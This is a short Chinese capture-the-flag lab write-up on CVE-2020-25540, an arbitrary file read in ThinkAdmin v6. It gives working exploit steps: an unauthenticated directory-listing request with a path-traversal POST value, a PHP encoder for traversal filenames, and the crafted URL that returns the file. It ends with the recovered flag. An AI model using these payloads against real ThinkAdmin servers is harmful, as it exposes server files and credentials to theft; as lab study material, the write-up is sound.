春秋云镜 CVE-2020-25540

isbug02023-08-07 18:27

春秋云镜 CVE-2020-25540 Thinkadmin v6任意文件读取漏洞

靶标介绍

ThinkAdmin 6版本存在路径查找漏洞,可利用该漏洞通过GET请求编码参数任意读取远程服务器上的文件。

启动场景

漏洞利用

1、未授权列目录poc

读取网站根目录Payload: http://think.admin/ThinkAdmin/public/admin.html?s=admin/api.Update/node

POST:

rules="/"

rules=".../.../.../" (目录穿越)

2、任意文件读取

使用加密函数对文件名进行加密

php 复制代码 
<?php
function encode($content)
{
    [$chars, $length] = ['', strlen($string = iconv('UTF-8', 'GBK//TRANSLIT', $content))];
    for ($i = 0; $i < $length; $i++) $chars .= str_pad(base_convert(ord($string[$i]), 10, 36), 2, 0, 0);
    return $chars;
}
$content="../../../flag";
echo encode($content);
?>

加密后的文件名为1a1a1b1a1a1b1a1a1b2u302p2v

请求http://eci-2ze3dysieeo26l90ip96.cloudeci1.ichunqiu.com/admin.html?s=admin/api.Update/get/encode/1a1a1b1a1a1b1a1a1b2u302p2v

base64解密得到文件内容

得到flag

flag{cef71ab7-c930-408d-8074-52350766063b}

相关推荐
Geometry Fu14 小时前
《物联网安全》第3.2章 无线传感器网络安全
物联网·安全·物联网安全·无线传感器网络·wsn
m0_7381207215 小时前
渗透测试基础——黑盒测试下的Web漏洞挖掘与利用解析(一)
服务器·前端·网络·安全·php
碳基硅坊15 小时前
Qwen3.5-9B在安全生产安全帽检测中的应用
人工智能·安全·安全帽检测·qwen3.5-9b
小江的记录本16 小时前
【JVM虚拟机】类加载机制:类加载全流程:加载→验证→准备→解析→初始化(附《思维导图》+《面试高频考点清单》)
java·jvm·spring boot·算法·安全·spring·面试
消失的旧时光-194318 小时前
企业认证与安全体系(四):企业登录认证流程全解析——JWT、Redis、Spring Security 如何协同工作?
redis·安全·spring·spring security·jwt
wb0430720119 小时前
食安大检查——从阿明餐厅的突击检查,看安全架构的六大防线
安全·安全架构
不灭锦鲤19 小时前
网络安全第113天
安全·web安全
IT菜鸟程19 小时前
【银河麒麟V10】OpenSSH安全加固指南:源码编译升级至9.8p1版本
安全
阿昭L19 小时前
Windows认证和安全对象的基本概念
windows·安全
逸Y 仙X19 小时前
文章五:Elasticsearch安全通信
java·大数据·安全·elasticsearch·搜索引擎·全文检索·jenkins
热门推荐
01GitHub 镜像站点02【AI】2026 年具身智能模型和世界模型总结03【踩坑记录 | 第一篇】微软商店无法使用时,如何手动安装 OpenAI Codex?附`.msix`文件系统错误解决方法04DeepSeek V4 + Claude Code thinking mode 400 错误修复方案05Codex 接入 DeepSeek API 完整配置文档06裂开!ChatGPT 居然开始要手机号验证,附详细解决方法07CC-Switch & Claude 基于 Linux 服务器安装使用指南08几个好用的ip纯净度检测网站09API Key 登录 Codex 也能用插件了,还支持会话删除和导出10CC-Switch 全平台下载、安装与使用全指南(Windows/macOS/Linux)